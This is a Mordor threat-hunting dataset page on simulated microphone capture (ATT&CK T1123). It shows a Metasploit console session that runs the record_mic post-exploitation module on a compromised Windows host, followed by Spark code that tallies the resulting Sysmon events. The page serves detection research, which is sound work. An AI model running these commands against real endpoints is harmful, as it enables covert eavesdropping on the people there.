MSF Record Mic

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2020/06/09

Modification Date

2020/06/09

Tactics

[‘TA0009’]

Techniques

[‘T1123’]

Tags

[‘Microphone Access’]

Dataset Description

This dataset represents adversaries accessing the microphone of an endpoint.

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author

Name

Link

Threat Hunter Playbook

Processes Accessing the Microphone Device

https://threathunterplaybook.com/notebooks/windows/09_collection/WIN-200609225055.html

Simulation Plan

Environment

Tool Type

Module

Mordor shire

C2

post

Adversary View

msf5 exploit(multi/handler) > use post/multi/manage/record_mic
msf5 post(multi/manage/record_mic) > set SESSION 2
SESSION => 2
msf5 post(multi/manage/record_mic) > info

      Name: Multi Manage Record Microphone
    Module: post/multi/manage/record_mic
  Platform: Linux, OSX, Windows
      Arch: 
      Rank: Normal

Provided by:
  sinn3r <sinn3r@metasploit.com>

Compatible session types:
  Meterpreter

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  DURATION  5                no        Number of seconds to record
  SESSION   2                yes       The session to run this module on.

Description:
  This module will enable and record your target's microphone. For 
  non-Windows targets, please use Java meterpreter to be able to use 
  this feature.

msf5 post(multi/manage/record_mic) > run

[*] 172.18.39.6 - 20%...
[*] 172.18.39.6 - 40%...
[*] 172.18.39.6 - 60%...
[*] 172.18.39.6 - 80%...
[*] 172.18.39.6 - 100%...
[*] 172.18.39.6 - Audio size: (55169 bytes)
[+] 172.18.39.6 - Audio recording saved: /home/msf/.msf4/loot/20200610025201_default_172.18.39.6_172.18.39.6.audi_358712.wav
[*] Post module execution completed
msf5 post(multi/manage/record_mic) >

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/collection/host/msf_record_mic.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+-------------------------+------------------------------------+-------+-----+
|Hostname                 |Channel                             |EventID|count|
+-------------------------+------------------------------------+-------+-----+
|WORKSTATION6.mordor.local|Microsoft-Windows-Sysmon/Operational|12     |1635 |
|WORKSTATION6.mordor.local|Microsoft-Windows-Sysmon/Operational|10     |1464 |
|WORKSTATION6.mordor.local|Microsoft-Windows-Sysmon/Operational|13     |605  |
|WORKSTATION5.mordor.local|Microsoft-Windows-Sysmon/Operational|10     |404  |
|WORKSTATION6.mordor.local|Microsoft-Windows-Sysmon/Operational|7      |303  |
|MORDORDC.mordor.local    |Microsoft-Windows-Sysmon/Operational|7      |277  |
|MORDORDC.mordor.local    |Microsoft-Windows-Sysmon/Operational|12     |157  |
|WORKSTATION5.mordor.local|Microsoft-Windows-Sysmon/Operational|13     |145  |
|MORDORDC.mordor.local    |Security                            |4703   |119  |
|MORDORDC.mordor.local    |Security                            |5447   |96   |
|WORKSTATION6.mordor.local|Microsoft-Windows-Sysmon/Operational|23     |87   |
|MORDORDC.mordor.local    |Security                            |4658   |74   |
|MORDORDC.mordor.local    |Security                            |5156   |74   |
|WORKSTATION6.mordor.local|Microsoft-Windows-Sysmon/Operational|11     |63   |
|MORDORDC.mordor.local    |Microsoft-Windows-Sysmon/Operational|10     |61   |
|MORDORDC.mordor.local    |Microsoft-Windows-Sysmon/Operational|13     |56   |
|MORDORDC.mordor.local    |Security                            |5158   |41   |
|WORKSTATION6.mordor.local|Security                            |5156   |39   |
|MORDORDC.mordor.local    |Microsoft-Windows-Sysmon/Operational|3      |36   |
|WORKSTATION5.mordor.local|Security                            |5156   |30   |
+-------------------------+------------------------------------+-------+-----+
only showing top 20 rows